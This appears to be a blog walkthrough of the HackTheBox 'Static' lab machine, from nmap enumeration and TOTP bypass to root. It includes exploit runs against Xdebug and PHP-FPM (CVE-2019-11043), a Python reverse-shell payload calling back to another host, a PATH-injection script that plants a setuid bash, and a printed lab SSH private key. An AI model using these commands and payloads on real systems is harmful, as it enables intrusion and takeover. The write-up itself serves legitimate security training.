This page looks best with JavaScript enabled

HackTheBox: Static

 ·  ☕ 7 min read

User

Started by running nmap to enumerate open ports:

22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
|   256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
|_  256 2d:43:bc:4e:b3:33:c9:82:4e🇩🇪b6:5e:10:ca:a7:c5 (ED25519)
2222/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
|   256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_  256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/vpn/ /.ftp_uploads/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Got a lot of information from nmap:

  • It may be running some kind of container because there are two ssh ports open with different OS versions.
  • There are some interesting directories listed in robots.txt.

Let’s check what’s inside the ftp folder:

FTP uploads

Inside warning.txt there is a small message:

Binary files are being corrupted during transfer!!! Check if are recoverable.

So it’s giving us a small hint that the file is corrupted, so downloaded the gz file, tried to decompress it and as expected it returns an error:

tar xvzf db.sql.gz 

gzip: stdin: invalid compressed data--crc error

gzip: stdin: invalid compressed data--length error
tar: Child returned status 1
tar: Error is not recoverable: exiting now

Searching information it seems that the file was downloaded using ascii mode instead of binary mode from the ftp, in this post they explain how to recover it:

./fixgz db.sql.gz db.sql

It can also be recovered with gzrecover

The recovered file seems to have some sort of unfinished sql file:

CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsignint  a'n a)Co3 Nto_increment,sers name varchar(20) a'n a)Co, password varchar(40) a'n a)Co, totp varchar(16) a'n a)Co, primary key (idS iaA; 
INSERT INTOrs ( id smaers name vpassword vtotp vaS iayALUESsma, prim'admin'im'd05nade22ae348aeb5660fc2140aec35850c4da997m'd0orxxi4c7orxwwzlo'
IN

At this point I tried to recover the password, it was 40 characters long so may be SHA-1, but didn’t manage to achieve so. Went to /vpn which redirects us to a login form and we can easily login using admin:admin, then it asks for a 2FA code, so we have to use the totp code in the sql file to generate it.

It won’t work unless we are syncronised with the server’s time. We can use nmap to check the time difference:

nmap -Pn -sV --script=http-date -p 8080 static.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-05 23:04 CEST
Nmap scan report for static.htb (10.10.10.246)
Host is up (0.048s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-date: Mon, 05 Jul 2021 21:17:18 GMT; +12m36s from local time.
|_http-server-header: Apache/2.4.38 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

So let’s syncronize using curl following this post:

date -s "$(date -d "$(curl -sI http://static.htb:8080| grep -i '^date:'|cut -d' ' -f2-)" | xargs -I {} date --date='{}' "+%Y-%m-%d %H:%M:%S")"

Since the key must be 16 characters long and the sql has an 18 removed d0 at the start because it seems like noise (it was also on the password field). Then used oathtool to generate them,

oathtool -b --totp 'orxxi4c7orxwwzlo'

Here is the internal port

Internal portal

So it shows IPs of hosts that should be available, we can generate a vpn config file too. However we can’t just start both vpn clients at the samte time, so did the following (inspired by this answer)

sudo openvpn --route-nopull --config ./vpn/static.ovpn

We can verify our network configuration:

ifconfig
...

tun9: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 172.30.0.11  netmask 255.255.0.0  destination 172.30.0.11
        inet6 fe80::ddf9:1ad1:b077:82be  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3  bytes 448 (448.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

On another terminal create static routes to tunnel the traffic of that network:

sudo route add -net 172.20.0.0 netmask 255.255.0.0 gw 172.30.0.1 tun9
sudo route add -net 10.10.14.0 netmask 255.255.254.0 gw 10.10.14.1 tun0

Enumerated ports on the database just in case:

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.12-MariaDB-1:10.4.12+maria~bionic
|   Thread ID: 35
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolOld, SupportsTransactions, Support41Auth, IgnoreSigpipes, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase, DontAllowDatabaseTableColumn, InteractiveClient, ODBCClient, IgnoreSpaceBeforeParenthesis, LongColumnFlag, FoundRows, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: n*%wN]j{MO"\)WZ=bWj3
|_  Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:canonical:ubuntu_linux:18.04

It seems vulnerable to CVE-2016-6663, but we don’t have credentials so isn’t useful at least at the moment.

Here is the scan on the web server:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
|   256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_  256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
80/tcp open  http    Apache httpd 2.4.29
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 19    2020-04-03 15:18  info.php
| -     2020-03-26 09:40  vpn/
|_
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Index of /
Service Info: Host: 172.20.0.10; OS: Linux; CPE: cpe:/o:linux:linux_kernel

There is phpinfo in /info.php and after checking it out found xdebug 2.6.0 enabled:

Xdebug

Used this POC to exploit it and get user flag:

./xdebug-shell.py -l 172.30.0.10 -u http://172.20.0.10/info.php
>> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Afterwards grabbed ssh id_rsa (the exploit has limited rows so read it 6rows each time):

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA0pNa5qwGZ+DKsS60GPhNfCqZti7z1xPzxOTXwtwO9uYzZpq/
nrhzgJq0nQNVRUbaiZ+H6gR1OreDyjr9YorV2kJqccscBPZ59RAhttaQsBqHkGjJ
QEHYKteL1D+hJ80NDd7fJTtQgzT4yBDwrVKwIUSETMfWgzJ5z24LN5s/rcQYgl3i
VKmls3lsod8ilakdDoYEYt12L4ST/exEoVl0AyD9y8m651q40k1Gz4WzPnaHAlnj
mL6CANfiNAJoc8WnqZN5ruSrWhmivmDbKLlDCO5bCCzi2zMHJKqQkcBxdWk60Qhi
17UJMV3mKVQRprvpeTR2jCMykH81n2KU46doSQIDAQABAoIBAADCHxWtkOhW2uQA
cw2T91N3I86QJLiljb8rw8sj17nz4kOAUyhTKbdQ102pcWkqdCcCuA6TrYhkmMjl
pXvxXAvJKXD3dkZeTNohEL4Dz8mSjuJqPi9JDWo6FHrTL9Vg26ctIkiUChou2qZ9
ySAWqCO2h3NvVMpsKBwjHU858+TASlo4j03FJOdmROmUelcqmRimWxgneHBAHEZj
GqDuPjmPmw7pbThqlETyosrbaB3rROzUp9CKAHzYB1BvOTImDsb6qQ+GdKwewAQf
j60myPuxl4qgY8O2yqLFUH3/ovtPTKqHJSUFBO23wzS1qPLupzu1GVXwlsdlhRWA
Amvx+AECgYEA6OOd9dgqXR/vBaxDngWB6ToVysWDjO+QsjO4OpFo7AvGhMRR+WpK
qbZyJG1iQB0nlAHgYHEFj4It9iI6NCdTkKyg2UzZJMKJgErfgI0Svkh/Kdls23Ny
gxpacxW3d2RlyAv4m2hG4n82+DsoPcN+6KxqGRQxWywXtsBsYkRb+wkCgYEA53jg
+1CfGEH/N2TptK2CCUGB28X1eL0wDs83RsU7Nbz2ASVQj8K0MlVzR9CRCY5y6jcq
te1YYDiuFvT+17ENSe5fDtNiF1LEDfp45K6s4YU79DMp6Ot84c2fBDIh8ogH0D7C
CFdjXCI3SIlvc8miyivjRHoyJYJz/cO94DsTE0ECgYA1HlWVEWz4OKRoAtaZYGA1
Ng5qZYqPxsSWIL3QfgIUdMse1ThtTxUgiICYVmqmfP/d/l+TH7RI+0RIc54a7y1c
PkOhzKlqfQSnwmwgAg1YYWi/vtvZYgeoZ4Zh4X4rOTcN3c0ihTJFzwZWsAeJruFv
aIP6nGR1iyUNhe4yq6zfIQKBgANYQNAA2zurgHeZcrMUqsNdefXmB2UGPtKH9gGE
yhU9tMRReLeLFbWAfJj2D5J2x3xQ7cIROuyxBPr58VDGky2VTzRUo584p/KXwvVy
/LaJiVM/BgUCmhxdL0YNP2ZUxuAgeAdM0/e52time8DNkhefyLntlhnqp6hsEqtR
zzXBAoGBANB6Wdk/X3riJ50Bia9Ai7/rdXUpAa2B4pXARnP1/tw7krfPM/SCMABe
sjZU9eeOecWbg+B6RWQTNcxo/cRjMpxd5hRaANYhcFXGuxcg1N3nszhWDpHIpGr+
s5Mwc3oopgv6gMmetHMr0mcGz6OR9KsH8FvW1y+DYY3tUdgx0gau
-----END RSA PRIVATE KEY-----

When I tried to connect using the key got an error:

ssh -i id_rsa www-data@172.20.0.10 -vvv nos muestra un fallo:
...
        expecting SSH2_MSG_KEX_ECDH_REPLY

So after some help it seems that we need to specify the algorightm like follows:

ssh -o MACs=hmac-sha2-256 -i id_rsa www-data@172.20.0.10

Root

Here is the network configuration:

ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.20.0.10  netmask 255.255.255.0  broadcast 172.20.0.255
        ether 02:42:ac:14:00:0a  txqueuelen 0  (Ethernet)
        RX packets 3177  bytes 1893058 (1.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2601  bytes 1789532 (1.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.254.2  netmask 255.255.255.0  broadcast 192.168.254.255
        ether 02:42:c0:a8:fe:02  txqueuelen 0  (Ethernet)
        RX packets 4418  bytes 1880772 (1.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 6354  bytes 2552579 (2.5 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Now we can try to access pki host. Let’s scan the ports, to do so we only have wget available:

for i in {1..65535}; do wget -qS -O-  192.168.254.3:$i; done
  HTTP/1.1 200 OK
  Server: nginx/1.14.0 (Ubuntu)
  Date: Thu, 01 Jul 2021 02:12:11 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  X-Powered-By: PHP-FPM/7.1
batch mode: /usr/bin/ersatool create|print|revoke CN

It has only port 80 open, and it seems that is using PHP-FPM/7.1:
Searching for exploits for that version, found this POC on CVE-2019-11043 and transfer all files using ssh:

scp -r -P 2222 -i id_rsa ./exploit/  www-data@static.htb:/tmp/exploit/

Then we execute the exploit:

python3 exploit.py --url http://192.168.254.3/index.php
[*] QSL candidate: 1754, 1759, 1764
[*] Target seems vulnerable (QSL:1754/HVL:220): PHPSESSID=90a02f428a3d6948112aaed46b2858a3; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://192.168.254.3/index.php?a=bin/ls+/

And created a reverse shell with a python script after using which to determine available programs:

1
2
3
4
5
import requests as re

payload = '/usr/bin/python3.6 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
params = {"a": payload}
r = re.get("http://192.168.254.3/index.php", params=params)

We check files with capabilities in the fs and the tool mentioned before:

getcap -r / 2>/dev/null
/usr/bin/ersatool = cap_setuid+eip

Used pspy to check what is running under the hood:

pspy

It’s using openssl with a relative path, so we can exploit it by using PATH Injection to get root:

echo -e '#!/bin/bash\ncp /bin/bash /tmp\nchmod 777 /tmp/bash\nchmod u+s /tmp/bash' > /tmp/openssl
export PATH="/tmp:$PATH"

Finally we can execute ersatool create a zone and there is a suid bash in /tmp that we can use to get root with /tmp/bash -p.

Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover